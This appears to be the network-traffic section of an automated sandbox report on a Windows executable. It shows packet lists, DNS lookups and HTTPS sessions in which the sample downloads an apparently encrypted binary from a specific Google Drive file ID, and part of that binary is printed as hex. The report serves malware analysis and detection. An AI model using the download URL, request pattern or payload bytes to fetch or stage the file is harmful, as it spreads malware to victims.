                                                Nov 8, 2024 14:23:34.394932032 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.395262957 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.395302057 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.395525932 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.397170067 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.397538900 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.397578955 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.397844076 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.399554014 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.399822950 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.399842978 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.400064945 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.401809931 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.402076006 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.402095079 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.402301073 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.411633968 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411706924 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411740065 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411823988 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411844969 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.411869049 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411891937 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.412023067 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.412023067 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.412132978 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.413125038 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.413316011 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.413337946 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.413635969 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.415293932 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.415564060 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.415582895 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.415859938 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.417510033 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.417778969 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.417798996 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.418050051 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.419640064 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.419903994 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.419923067 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.420171976 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.421792030 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.422046900 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.422065973 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.422293901 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.424362898 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.424546957 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.424565077 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.424751997 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.432574987 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432641029 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432673931 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432739019 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432775974 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.432796955 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432884932 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.433007956 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.434395075 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.434607029 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.434729099 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.434947968 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.436526060 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.436790943 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.436810970 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.437098980 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.438493013 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.438720942 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.438740015 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.438972950 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.440531969 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.440754890 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.440773964 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.440990925 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.442523003 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.442783117 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.442800045 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.443038940 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.451936007 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452008009 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452049017 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452137947 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452214956 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.452214956 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.452234030 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452363014 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.452442884 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.454056978 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.454265118 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.454284906 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.454497099 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.455727100 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.455996037 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.456017017 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.456265926 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.457623005 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.457844019 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.457864046 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.458079100 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.459459066 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.459724903 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.459743023 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.459950924 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.461385965 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.461652040 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.461671114 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.461920023 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.463145018 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.463392973 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.463412046 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.463635921 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.464863062 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.465128899 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.465147972 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.465392113 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.466598988 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.466876984 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.466895103 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.467142105 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.473195076 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.473254919 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.473282099 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.473438025 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.473438025 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.473458052 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.473659039 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.475080013 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.475286007 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.475303888 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.475482941 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.475549936 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.475775957 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.475794077 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.475972891 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.477169991 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.477437973 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.477457047 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.477735996 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.478815079 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.479063034 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.479084015 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.479288101 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.480341911 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.480602980 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.480621099 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.480874062 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.481930017 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.482189894 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.482208967 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.482441902 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.483414888 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.483669996 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.483689070 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.483870983 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.484901905 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.485112906 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.485131025 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.485342979 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.486449957 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.486704111 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.486722946 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.486959934 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.488168001 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.488428116 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.488446951 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.488621950 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.489398003 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.489659071 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.495028019 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.495099068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.495129108 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.495191097 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.495204926 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.495223999 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.495340109 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.495434046 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.496257067 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.496510983 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.496530056 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.496712923 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.496753931 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.497009039 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.497025967 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.497260094 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.498034000 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.498296976 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.498315096 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.498588085 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.499412060 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.499677896 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.499696970 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.499901056 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.500793934 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.500976086 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.500993967 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.501231909 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.502109051 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.502286911 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.502300024 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.502482891 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.503391981 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.503572941 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.503586054 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.503834009 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.504740953 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.504861116 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.504929066 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.505050898 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.505050898 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.804729939 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.804785967 CET44349763142.250.65.225192.168.11.20

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 8, 2024 14:23:30.879730940 CET5439153192.168.11.201.1.1.1
                                                Nov 8, 2024 14:23:30.982893944 CET53543911.1.1.1192.168.11.20
                                                Nov 8, 2024 14:23:31.496623039 CET6139653192.168.11.201.1.1.1
                                                Nov 8, 2024 14:23:31.599538088 CET53613961.1.1.1192.168.11.20

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 8, 2024 14:23:30.879730940 CET192.168.11.201.1.1.10x51e1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                Nov 8, 2024 14:23:31.496623039 CET192.168.11.201.1.1.10xcf54Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 8, 2024 14:23:30.982893944 CET1.1.1.1192.168.11.200x51e1No error (0)drive.google.com142.250.72.110A (IP address)IN (0x0001)false
                                                Nov 8, 2024 14:23:31.599538088 CET1.1.1.1192.168.11.200xcf54No error (0)drive.usercontent.google.com142.250.65.225A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • drive.google.com
                                                • drive.usercontent.google.com

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.2049762142.250.72.1104433100C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                TimestampBytes transferredDirectionData
                                                2024-11-08 13:23:31 UTC216OUTGET /uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                2024-11-08 13:23:31 UTC1766INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Fri, 08 Nov 2024 13:23:31 GMT
                                                Location: https://drive.usercontent.google.com/download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy: script-src 'nonce-81ogKFfxjYAJ7LV_Ca_c8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.11.2049763142.250.65.2254433100C:\Users\user\Desktop\LkzvfB4VFj.exe
                                                TimestampBytes transferredDirectionData
                                                2024-11-08 13:23:31 UTC258OUTGET /download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                2024-11-08 13:23:34 UTC4915INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Content-Security-Policy: sandbox
                                                Content-Security-Policy: default-src 'none'
                                                Content-Security-Policy: frame-ancestors 'none'
                                                X-Content-Security-Policy: sandbox
                                                Cross-Origin-Opener-Policy: same-origin
                                                Cross-Origin-Embedder-Policy: require-corp
                                                Cross-Origin-Resource-Policy: same-site
                                                X-Content-Type-Options: nosniff
                                                Content-Disposition: attachment; filename="thEwhiR75.bin"
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: false
                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                Accept-Ranges: bytes
                                                Content-Length: 286784
                                                Last-Modified: Wed, 09 Oct 2024 10:53:21 GMT
                                                X-GUploader-UploadID: AHmUCY1goqz51DDG8tHWHMmu8WjBo9nLH65qK2_punls4l54EtnxK2S6oo5-D_iCnbPRUkDor5QnW4SDwQ
                                                Date: Fri, 08 Nov 2024 13:23:33 GMT
                                                Expires: Fri, 08 Nov 2024 13:23:33 GMT
                                                Cache-Control: private, max-age=0
                                                X-Goog-Hash: crc32c=YfZAAg==
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close
                                                2024-11-08 13:23:34 UTC4915INData Raw: 42 eb 05 f9 a6 6f c0 7d 76 29 22 bf c7 8c a1 2f 0d 70 4a 57 fb 49 79 38 6c 3b bc c2 07 fa 78 d2 28 4a 03 7d 23 55 dd 48 ce 1a db 37 17 54 ab 45 65 72 2b e5 ee 4d e1 25 92 80 95 9e 93 1f 5b bc b1 90 ac 2c b8 55 c1 e5 03 75 ea cf 78 9b e4 fc 0b 80 c6 db 91 4e 87 72 57 70 b7 52 e6 61 b8 1f d5 59 b3 a0 49 72 8e 7e 46 b2 d5 86 72 a7 cd 49 3b 31 f3 59 49 f8 0f 12 a2 e0 8e 82 b3 ac 44 29 1a 44 6e 6c 25 fa 45 d7 3a 63 96 35 ff 92 3e b4 c9 16 92 9d bc 18 78 d2 29 f7 67 42 a1 bf dd 67 9c 3f 54 7c 0d 49 44 53 20 f5 4e 86 8f 0f 0d 35 96 97 50 bd e2 e3 5c c9 c2 14 7c c6 3e 01 78 a8 a4 35 01 95 e2 99 a5 89 e4 29 0b fb 58 0b fe c7 ba 08 a1 d2 e6 1c 72 28 87 65 04 74 e3 dc bc f4 11 f5 6e 35 00 63 62 5c 27 b7 2e fb d8 fa 01 11 d5 9c 36 9e 54 b9 07 07 83 14 a9 28 45 b8 19
                                                Data Ascii: Bo}v)"/pJWIy8l;x(J}#UH7TEer+M%[,UuxNrWpRaYIr~FrI;1YID)Dnl%E:c5>x)gBg?T|IDS N5P\|>x5)Xr(etn5cb\'.6T(E
                                                2024-11-08 13:23:34 UTC4873INData Raw: a9 28 b1 58 9b b0 6c 52 c0 0a 8c 94 34 15 ce 0b 5d ca ce 8f 5c a4 c9 55 e0 6e aa 29 93 92 c0 71 2e 34 bd da 03 bb 8d f4 16 03 ca 06 11 45 c8 25 24 82 7d 99 f5 81 70 6c a9 b4 0a 9f 6d a7 14 38 8a b3 4e dd aa c3 2e cd f8 f6 96 95 12 26 df ee 0a 7b 36 c7 b3 02 cb 87 61 46 a2 b1 d3 83 39 a7 68 1c 21 50 19 72 b4 bc 19 7e 92 c1 9a d8 ea dc 94 81 64 2e 38 b0 94 3e 33 ee 41 ec c1 3b 07 b4 8b ec a8 da 01 b9 14 a9 1e 76 43 45 7a 89 14 35 4c bd 3b e7 65 a7 43 0d c3 1c 40 87 b9 41 8a 00 6c fc dd ca 98 5f a1 5f a8 89 91 87 7c c7 43 70 dd 42 cd 75 8e f4 3b 1f 81 72 58 af 8e 0c 93 94 54 0e d8 72 c8 86 f5 62 c3 ac 1f c0 75 3a 27 dd 54 f4 8a a3 d1 61 2c 23 e0 be 5e 62 5a 3b 38 7a 6c 6a e0 bb b0 6f ec 50 3c 79 98 d2 2c f6 23 a4 0d 62 28 65 22 f1 53 83 1d d8 47 f2 a9 1a 09
                                                Data Ascii: (XlR4]\Un)q.4E%$}plm8N.&{6aF9h!Pr~d.8>3A;vCEz5L;eC@Al__|CpBu;rXTrbu:'Ta,#^bZ;8zljoP<y,#b(e"SG
                                                2024-11-08 13:23:34 UTC1255INData Raw: 2c dc 21 c6 cc 51 29 d3 23 a3 51 b4 57 a4 a3 2a e4 1c d2 86 b2 d7 4b 78 30 85 06 cc 9b f2 e0 c2 70 92 a3 e1 0d f2 2e 8f b0 63 59 9f e0 b5 13 89 53 c1 f7 8b 8f cd b6 5b 3e c4 53 d4 9d 68 8c 85 f4 e4 8f 28 f1 7f 3f 9c 77 32 56 a3 17 81 0b 6d af 37 f2 75 4e 33 60 fe 5a a1 63 96 4b 39 eb df 8d a4 c2 1c 21 63 50 de b6 19 53 da ac 60 29 ce 30 65 6e 3c 74 ae 40 64 00 04 f8 b5 f2 26 3d 89 b2 cd 55 8b f9 ae 08 bf e9 96 90 10 97 32 0a 66 21 df 98 3a 86 4f b3 8b d1 04 19 6c 6b 2f 21 16 99 41 cf dd f0 66 18 e7 17 d1 e3 04 03 b6 59 cb 74 cb 18 27 81 f4 4a a1 e7 ef b4 63 ba e9 f3 99 ff 33 b3 e4 be 15 de 29 9e 99 7f a0 09 7a fa 77 2a 6c 70 3a 1a ca b2 d7 50 92 5f b2 9d b3 ed 08 4a 3a 09 c2 e6 3b 07 ea b6 db 03 96 3d 92 45 66 f3 dc 15 07 be a9 dc 8a 24 86 7e 65 d8 d5 55
                                                Data Ascii: ,!Q)#QW*Kx0p.cYS[>Sh(?w2Vm7uN3`ZcK9!cPS`)0en<t@d&=U2f!:Olk/!AfYt'Jc3)zw*lp:P_J:;=Ef$~eU
                                                2024-11-08 13:23:34 UTC64INData Raw: f6 f4 b7 41 6d 92 c8 66 f2 66 c7 1f 22 f3 40 ac 0f 43 ac 40 67 d8 cc ee ef 4a bd 14 7c 7f a5 5b 78 a8 67 5e 19 35 df 46 84 7a d9 49 fc 8b 9d 2d 96 78 67 e4 7c d6 55 29 e9 56 f9 e7 ae 3f 56 34
